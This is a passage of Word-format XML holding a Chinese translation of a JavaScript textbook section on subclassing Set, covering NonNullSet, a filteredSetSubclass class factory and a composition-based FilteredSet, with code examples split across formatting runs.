        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-13</w:t>
      </w:r>
      <w:r>
        <w:t>对此做了展示。它定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的子类</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullSet</w:t>
      </w:r>
      <w:r>
        <w:t>，它不允许</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>作为它的成员。为了使用这种方式对成员做限制，</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullSet</w:t>
      </w:r>
      <w:r>
        <w:t>需要在其</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中对</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值做检测。但它需要完全重新实现一个</w:t>
      </w:r>
      <w:r>
        <w:t>ad</w:t>
      </w:r>
      <w:r>
        <w:t>d()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，因此它调用了父类中的这个方法。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullSet()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数同样不需要重新实现，它只须将它的参数传入父类构造函数（作为函数来调用它，而不是通过构造函数来调用），通过父类的构造函数来初始化新创建的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-13</w:t>
      </w:r>
      <w:r>
        <w:t>：在子类中调用父类的构造函数和方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*NonNullSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的子类，它的成员不能是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function NonNullSet(){//</w:t>
      </w:r>
      <w:r>
        <w:t>仅链接到父类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>作为普通函数调用父类的构造函数来初始化通过该构造函数调用创建的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.app</w:t>
      </w:r>
      <w:r>
        <w:t>ly(this,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullSet</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NonNullSet.prototype=inherit(Set.prototype);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NonNullSet.prototype.constructor=NonNullSet;//</w:t>
      </w:r>
      <w:r>
        <w:t>为了将</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>排除在外，只须重写</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NonNullSet.prototype.add=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>检查参数是不是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.le</w:t>
      </w:r>
      <w:r>
        <w:t>ngth;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments[i]==null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("Can't add null or undefined to a NonNullSet");//</w:t>
      </w:r>
      <w:r>
        <w:t>调用父类的</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以执行实际插入操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Set.prototype.add.apply(this,arguments);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让我们将这个非</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>集合的概念推而广之，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>过滤后的集合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，这个集合中的成员必须首先传入一个过滤函数再执行添加操作。为此，定义一个类工厂函数（类似例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>enu</w:t>
      </w:r>
      <w:r>
        <w:t>meration()</w:t>
      </w:r>
      <w:r>
        <w:t>函数），传入一个过滤函数，返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>子类。实际上，可以对此做进一步的通用化的处理，定义一个可以接收两个参数的类工厂：子类和用于</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的过滤函数。这个工厂方法称为</w:t>
      </w:r>
      <w:r>
        <w:t>filteredsetSubclass()</w:t>
      </w:r>
      <w:r>
        <w:t>，并通过这样的代码来使用它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个只能保存字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var StringSet=filteredSetSubclass(Set,function(x){return typeof x==="string";});//</w:t>
      </w:r>
      <w:r>
        <w:t>这个集合类的成员不能是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>und</w:t>
      </w:r>
      <w:r>
        <w:t>efined</w:t>
      </w:r>
      <w:r>
        <w:t>或函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var MySet=filteredSetSubclass(NonNullSet,function(x){return typeof x!=="function";});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-14</w:t>
      </w:r>
      <w:r>
        <w:t>是这个类工厂函数的实现代码。注意，这个例子中的方法链和构造函数链和</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullset</w:t>
      </w:r>
      <w:r>
        <w:t>中的实现是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-14</w:t>
      </w:r>
      <w:r>
        <w:t>：类工厂和方法链</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数返回具体</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>并重写该类的</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用以对添加的元素做特殊的过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>filteredSetSubclass(superclass,filter){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var constructor=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>子类构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>superclass.apply(this,arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用父类构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var proto=constructor.prototype=inherit(superclass.prototype);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>proto.constructor=constructor;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>proto.add=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>在添加任何成员之前首先使用过滤器</w:t>
      </w:r>
      <w:r>
        <w:t>将所有参数进行过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var v=arguments[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!filter(v))throw("value"+v+"rejected by filter");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用父类的</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>superclass.prototype.add.apply(this,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return constructor;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9-14</w:t>
      </w:r>
      <w:r>
        <w:t>中一个比较有趣的事情是，用一个函数将创建子类的代码包装起来，这样就可以在构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>和方法链中使用父类的参数，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>而不是通过写死某个父类的名字来使用它的参数。也就是说如果想修改父类，只须修改一处代码即可，而不必对每个用到父类类名的地方都做修改。已经有充足的理由证明这种技术的可行性，即使在不是定义类工厂的场景中，这种技术也是值得提倡使用的。比如，可以这样使用包装函数和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-11</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype.extend()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来重写</w:t>
      </w:r>
      <w:r>
        <w:t>NonNullSet</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var NonNullSet=(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义并立即调用这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>superclass=Set;//</w:t>
      </w:r>
      <w:r>
        <w:t>仅指定父类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return superclass.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(){superclass.apply(this,arguments);},//</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{//</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>检查参数是否是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments[i]==null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("Can't add null or undefined");//</w:t>
      </w:r>
      <w:r>
        <w:t>调</w:t>
      </w:r>
      <w:r>
        <w:t>用父类的</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以执行实际插入操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return superclass.prototype.add.apply(this,arguments);</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最后，值得强调的是，类似这种创建类工厂的能力是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言动态特性的一个体现，类工厂是一种非常强大和有用的特性，这在</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>等语言中是没有的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="9_7_3_Zu_He_vsZi_Lei_"/>
      <w:r>
        <w:t>9.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　组合</w:t>
      </w:r>
      <w:r>
        <w:t>vs</w:t>
      </w:r>
      <w:r>
        <w:t>子类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在前一节中，定义的集合可以根据特定的标准对集合成员做限制，而且使用了子类的技术来实现这种功能，所创建的自定义子类使用了特定的过滤函数来对集合中的</w:t>
      </w:r>
      <w:r>
        <w:t>成员做限制。父类和过滤函数的每个组合都需要创建一个新的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而还有另一种更好的方法来完成这种需求，即面向对象编程中一条广为人知的设计原则：</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>组合优于继承</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>。这样，可以利用组合的原理定义一个新的集合实现，它</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>了另外一个集合对象，在将受限制的成员过滤掉之后会用到这个（包装的）集合对象。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-15</w:t>
      </w:r>
      <w:r>
        <w:t>展示了其工作原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-15</w:t>
      </w:r>
      <w:r>
        <w:t>：使用组合代替继承的集合的实现</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实现一个</w:t>
      </w:r>
      <w:r>
        <w:t>FilteredSet</w:t>
      </w:r>
      <w:r>
        <w:t>，它包装某个指定的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>对象，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>并对传入</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的值应用了某种指定的过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*"</w:t>
      </w:r>
      <w:r>
        <w:t>范围</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>类中其他</w:t>
      </w:r>
      <w:r>
        <w:t>所有的核心方法延续到包装后的实例中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var FilteredSet=Set.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function FilteredSet(set,filter){//</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.set=set;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.filter=filter;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{//</w:t>
      </w:r>
      <w:r>
        <w:t>实例方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果已有过滤器，直接使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.filter){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var v=arguments[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!this.filter(v))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("FilteredSet:value"+v+"rejected by filter");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
